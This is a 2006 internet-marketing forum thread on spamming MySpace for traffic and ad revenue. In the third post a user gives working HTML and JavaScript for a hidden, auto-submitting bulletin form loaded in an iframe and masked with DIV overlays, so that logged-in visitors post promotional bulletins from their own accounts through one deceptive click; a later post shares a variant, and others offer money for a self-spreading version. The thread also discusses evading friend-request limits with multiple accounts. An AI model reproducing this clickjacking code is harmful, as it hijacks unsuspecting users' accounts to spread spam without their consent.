1. Advertising
    y u no do it?

Advertising (learn more)

Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

Starts at just $1 per CPM or $0.10 per CPC.

Myspace! Myspace! Myspace! = $$$

Discussion in 'Social Networks' started by exaro, Jun 6, 2006.

Thread Status:
Not open for further replies.
  1. dsrlolok

dsrlolok Peon

Best Answers:

myspace has a limit of 500 friend requests per day. myspace isnt unlike any other marketing medium in that no matter how many people you get your message out to, the advertisement has to be effective. this is why youll get a lot more friends with a hot girl as your picture than an ugly man. people would rather be friends than an attractive woman than an ugly man, especially the users of myspace. if you request 500 friends a day, youre obviously not going to get all 500 to add you that day. people sometimes dont sign on for a day, they dont approve everyone who adds them. In my experience, 300-350 is a good day. thats why i like to supplement my clients who want friend adds by adding them to trains. that way they get friend requests that put them over the 500 friend per day limit

dsrlolok, Jun 6, 2006 IP
  2. ECoverFX

ECoverFX Peon

Best Answers:
    I just signed up for myspace here last week. I had purchased some videos that explain how to get some traffic from myspace. When I got on there and started looking around I got at least 3 niche ideas that will use a few of those domain names I have laying around. The possibilities here are really mind boggling.

Looking foward to Exaro's next post!

Thanks!
    Michelle

ECoverFX, Jun 6, 2006 IP
  3. exaro

exaro Peon

Best Answers:

False. Their limit is only 50 actions per day of each feature.

DISCLAIMER: Since I first put this out on the web myspace has added a feature that disallows any myspace page to be viewed through an iframe. So basically this doesnt work anymore but I would like to show you how it's really done anyway. :cool:

This is how I pulled off the big spike in adsense...

This is a very ROUGH version of the source I used to make the bulletin post link. It appeared much smoother on my site than it will if you attempt to copy this source onto one of your pages. This is for educational purposes only ;)

First you're gonna want to create a page with this code lets call it "bulletinpage.php"

<script language="javascript"> function reDirect() { document.bulletinForm.submit() } </script> </head> <body 
    onLoad="reDirect()"> <style type="text/css">.sneaky { display: none; visibility: hidden; }</style> <form action="http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.confirm" method="post" name="bulletinForm">
    <input type="hidden" name="groupID" value="0"> <span class="sneaky"> <input type="hidden" name="subject" value="BULLETIN TITLE TEXTTT" size="1" maxlength="50"> <textarea name="body" type="hidden" style="width: 0px; height: 0px;">BULLETIN BODY TEXTTTTTTTTTTTTTT WITH INFORMATION AND LINK TO YOUR WEBSITE!!!!!!
    </textarea></span><input type="submit" value="submit" /></form>

Code (markup):
    This code is used to submit to the bulletin confirm page without having to fill out any form, or click any buttons. It automatically redirects to the confirm page with the fields all filled in. THIS PAGE WILL NOT BE SEEN BY THE PERSON ON THE WEB PAGE GETTING READY TO "SHARE WITH FRIENDS" ACCORDING TO MY WAY. The next step would be to put this page in an iframe and conceal it under some DIV layers.

The next page is the one that the person viewing my website would see. (Except this is the bare bones code like I mentioned before) The purpose of this page is to only show the bulletin confirm button so the user is not distracted by anything from myspace in the iframe.

<html>
    <head>
    <title></title>
    </head>

<body bgcolor="#FFFFFF">

<div style="width: 480px; height: 430px; position: absolute; top:0px;left:0px; background-color: ffffff; border-width:1px;border-style:solid;border-color: ffffff;">  </div>

<div style="width: 480px; height: 730px; position: absolute; top:50px;left:338px; background-color: ffffff; border-width:1px;border-style:solid;border-color: ffffff;">  </div>

<div style="width: 300px; height: 730px; position: absolute; top:50px;left:0px; background-color: ffffff; border-width:1px;border-style:solid;border-color: ffffff;">  </div>

<div style="width: 300px; height: 730px; position: absolute; top:475px;left:50px; background-color: ffffff; border-width:1px;border-style:solid;border-color: ffffff;">  </div>

<div style="width: 300px; height: 430px; position: absolute; top:475px;left:50px; background-color: ffffff; border-width:1px;border-style:solid;border-color: ffffff;">  </div>
    <div style="width: 300px; height: 150px; position: absolute; top:60px;left:160px; background-color: ffffff; border-width:1px;border-style:solid;border-color: ffffff;"> <center>Click the post button below to share with your friends! You must be logged in for this to work.</center></div>
    <div style="width: 234px; height: 60px; position: absolute; top:5px;left:160px; background-color: ffffff; border-width:1px;border-style:solid;border-color: ffffff;"> <!-----Ad Code------></div>
    <div style="width: 234px; height: 60px; position: absolute; top:480px;left:160px; background-color: ffffff; border-width:1px;border-style:solid;border-color: ffffff;"> <!-----Ad Code------> </div>

<iframe src=bulletinpage.php frameborder=0 width=430 height=539></iframe>

</body>

</html>

Code (markup):
    This whole set up allows the person to post a bulletin without ever having to leave your site and doing only ONE CLICK, which gives you more publicity, and opens up more opportunities for one of their to view your site and do the same thing.

NOTEEE: THIS IS NOT A BULLETIN LOOP nor IS IT A SELF SUSTAINING BULLETIN TRAIN OR "WHORE" TRAIN. IT IS MERELY ONE CHANCE FOR A VISITOR OF YOUR WEBSITE TO SHARE WITH ANOTHER PERSON THEY NO. IT IS STRICTLY VOLUNTARY AND NOT AT ALL AUTOMATIC.

exaro, Jun 6, 2006 IP
  4. dsrlolok

dsrlolok Peon

Best Answers:
    You're actually quite wrong. Talk to anyone with a large account. You're allowed to request 500 people to be your friend a day. After 50, the CAPTCHA starts to require verification. You're allowed to send 500 individual messages a day. After each of these, the server disallows anything you do. No bulletins, no messages, no comments, no friend requests. You're allowed 250 comments a day. After this limit is reached, nothing happens except you can't post comments. I request 1497 people a day, 499 on 3 accounts. I post 250 comments a day for clients.

dsrlolok, Jun 6, 2006 IP
    exaro likes this.
  5. exaro

exaro Peon

Best Answers:

hahah yes I'm sorry, I forgot about the CAPTCHAs. I guess the 50 is my personal limit because I usually give up for the day if it ever starts showing up. sorry once again

exaro, Jun 6, 2006 IP
  6. tdnetworks

tdnetworks Peon

Best Answers:
    dsrlolok: which do you use?

tdnetworks, Jun 6, 2006 IP
  7. dsrlolok

dsrlolok Peon

Best Answers:
    which what?

dsrlolok, Jun 6, 2006 IP
  8. dsm56

dsm56 Active Member

Best Answers:
    I was an idiot, ignore this post.

dsm56, Jun 7, 2006 IP
  9. iatbm

iatbm Prominent Member

Best Answers:
    dsm : why are you bragging then ?

iatbm, Jun 7, 2006 IP
  10. cpr

cpr Peon

Best Answers:
    When i used the code and test it by clicking the link the it comes onto the confirm Bulletin page, any ideas?

I'm using the following code:

<form name="bulletinForm" action="http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.confirm" target="_blank" method="POST"><input type="hidden" name="groupID" value="0"><span class="hidethem"><input type="hidden" name="subject" value="Found a great site, check it out!!" size="1" maxlength="50"><textarea name="body" type="hidden" style="width: 0px; height: 0px;"></p>
    Hey guys, check this out, it's a great site <a href='http://www.profilenerds.com/'>Click me!!</a>
    </textarea></span><center><input type=submit class=submit value="Click me!! :D" name="submit"></center></form>

Thanks!! :)

cpr, Jun 7, 2006 IP
  11. ash1

ash1 Active Member

Best Answers:
    i say we should become each other myspace friends...i have over 150 friends...who wants to add to each other friend lists

ash1, Jun 7, 2006 IP
  12. Rouier

Rouier Banned

Best Answers:
    "The purpose of it, is to provide free advertising without doing any work. The only work you do is to get it started– “Set it and forget it”. You will be tapping into a network of 83 million users."

Full article is in my signature. Full details, instructions, and pictures to help you do it yourself.

Rouier, Jun 7, 2006 IP
  13. cpr

cpr Peon

Best Answers:
    I think they've already fixed it so this can longer work.

cpr, Jun 7, 2006 IP
  14. kemkeris

kemkeris Peon

Best Answers:
    Can you send me the code so I can take advantage of this also? I appreciate it!!

kemkeris, Jun 7, 2006 IP
  15. Rouier

Rouier Banned

Best Answers:
    There is a live link within the article I just wrote, just view source and do some experimenting. You can actually just copy all of the source code if you want, I don't mind. I wrote it to help people just like you.

Rouier, Jun 7, 2006 IP
  16. mizt

mizt Active Member

Best Answers:
    $100 to the first programmer that can make this thing automatic and endless. :p

mizt, Jun 7, 2006 IP
  17. worud

worud Guest

Best Answers:
    Ill pay $200 if you give it to me first!

worud, Jun 7, 2006 IP
  18. mike323

mike323 Well-Known Member

Best Answers:
    why would they be invalid clicks? or were you just joking? :)

mike323, Jun 7, 2006 IP
  19. CosmosCR

CosmosCR Guest

Best Answers:
    WOW!!!!

They have disabled the re-posting of bullitens? So now all those trains dont work anymore... this is crazy, I remember a guy trying to sell a myspace train site like a week ago.. i wonder if some poor sucker bought it.

CosmosCR, Jun 7, 2006 IP
  20. cpr

cpr Peon

Best Answers:
    haha, this is going to mess up so many peoples sites, unlucky for them i guess!

cpr, Jun 7, 2006 IP
Thread Status:
Not open for further replies.